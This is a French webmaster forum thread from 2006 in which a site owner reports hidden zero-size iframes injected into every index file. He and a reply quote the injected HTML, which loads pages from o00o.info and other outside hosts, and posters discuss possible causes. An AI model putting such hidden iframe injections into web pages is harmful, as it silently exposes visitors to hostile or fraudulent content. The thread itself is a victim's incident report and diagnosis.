On s'est fait hacker ?
17 messages • Page 1 sur 2 • 1, 2
Consultez la formation à Google Analytics de WebRankInfo / Ranking Metrics
On s'est fait hacker ?
Bonjour,
Nous étions content que notre site soit valide soit valide XHTML1...
Mais depuis quelques temps 34 fautes sont apparues... J'ai pensé à des problèmes dans le code...
Mais finalement nous avons trouvé un code similaire dans tous nos fichiers index même sur des répertoires contenant de simples essais de cms non référencés par google...
Je suis surpris ! Et je me demande si d'autres personnes ont eu le même problème... ?
Auriez-vous des conseils au niveau sécurité serveur, meme si à priori nos le failles de sécurité sont à jour.
Voici le code en question qui était inséré en dehors du body
(
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Merci pour votre aide !!!
Franck
Nous étions content que notre site soit valide soit valide XHTML1...
Mais depuis quelques temps 34 fautes sont apparues... J'ai pensé à des problèmes dans le code...
Mais finalement nous avons trouvé un code similaire dans tous nos fichiers index même sur des répertoires contenant de simples essais de cms non référencés par google...
Je suis surpris ! Et je me demande si d'autres personnes ont eu le même problème... ?
Auriez-vous des conseils au niveau sécurité serveur, meme si à priori nos le failles de sécurité sont à jour.
Voici le code en question qui était inséré en dehors du body
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=xiz marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
Merci pour votre aide !!!
Franck
Dernière édition par Franck le Ven Aoû 25, 2006 17:26, édité 1 fois.
J'allais faire la même remarque
Et compléter par le code source de la page de la frame :
Un hack qui ne sert que des intérêts financiers je pense...
Et compléter par le code source de la page de la frame :
- Code: Tout sélectionner
<iframe width=0 height=0 src=http://www.donefind.com/smartppc/portal.php?affzb=1&username=yoho></iframe><iframe width=0 height=0 src=http://www.hadbest.net/search/portal.php?affzb=1&username=xiz></iframe><iframe width=0 height=0 src=http://www.slowern.com/search/portal.php?username=had></iframe>
Un hack qui ne sert que des intérêts financiers je pense...
J'ai regardé ton code source et je n'y ai point vu de <iframe....> après le </body>
De plus chez moi ta page est bien valide Xhtml T
Ça pourrait peut être venir d'un soft que tu as en local, ça m'avais fait un cas similaire avec Norton (que j'ai désinstallé depuis belle lurette maintenant
)
De plus chez moi ta page est bien valide Xhtml T
Ça pourrait peut être venir d'un soft que tu as en local, ça m'avais fait un cas similaire avec Norton (que j'ai désinstallé depuis belle lurette maintenant
Sur notre site principal c'est normal on l'a retiré...
Mais c'est encore sur des sous-repertoires de cms que l'on a testé...
En fait ce code c'est inseré dans tous nos fichiers index...
Exemple d'url ou on ne l'a pas encore retiré :
Remplacez le Z par un y
http://www.experts-referencement.com/Zacs/
c'est tout en bas du code de cette page..
Mais c'est encore sur des sous-repertoires de cms que l'on a testé...
En fait ce code c'est inseré dans tous nos fichiers index...
Exemple d'url ou on ne l'a pas encore retiré :
Remplacez le Z par un y
http://www.experts-referencement.com/Zacs/
c'est tout en bas du code de cette page..
Je me disais qu'il avait peut être développe un script qui exploite les failles de sécurité et qui modifie les fichiers index...
ça lui génère peut être des milliers de liens !!!
En tout cas ça doit être automatisé car il a inséré ça dans tous nos index...
ça lui génère peut être des milliers de liens !!!
En tout cas ça doit être automatisé car il a inséré ça dans tous nos index...
-

mahefarivony - WRInaute accro

- Messages: 11405
- Inscription: Lun Oct 14, 2002 10:00
amusant de lire les memes sujets (au fait édites ton titres) sur les forums de webmastering
un lien interessant
http://forum.joomla.org/index.php?topic=86820.0
un lien interessant
http://forum.joomla.org/index.php?topic=86820.0
-

Audiofeeline - WRInaute accro

- Messages: 5183
- Inscription: Jeu Oct 20, 2005 19:47
C'est le principal probleme des scripts populaires (phpbb & co)...
Ceci-dit ce cms est plutôt bien fait...
Ceci-dit ce cms est plutôt bien fait...
17 messages • Page 1 sur 2 • 1, 2
Formation recommandée sur ce thème :
Formation Google Analytics : en 2 jours, apprenez comment exploiter l'essentiel des possibilités de l'outil de mesure d'audience de Google. Formation animée par Julien Coquet, expert certifié officiellement par Google Analytics.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Site hacker
- Du hacker dans l'air ?
- Hacker ou autre chose ?
- Hacker tout nul.
- Vous voulez hacker?
- Problème à cause d'un hacker
- Un de mes sites s'est fait hacker !
- victime d'un hacker (catégorie plaisantin ?)
- Google hacker ou c'est une blague de GG
- Ichiro 2.0, Mass deleter, hacker?
- Ne pas se faire hacker son site
- on cherche à hacker mon ssh
- Ils viennent de se faire hacker ?
- J'ai l'impression de m'etre fait hacker
- En s'attaquant au spaM on se fait Hacker son site
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 0 invités


le forum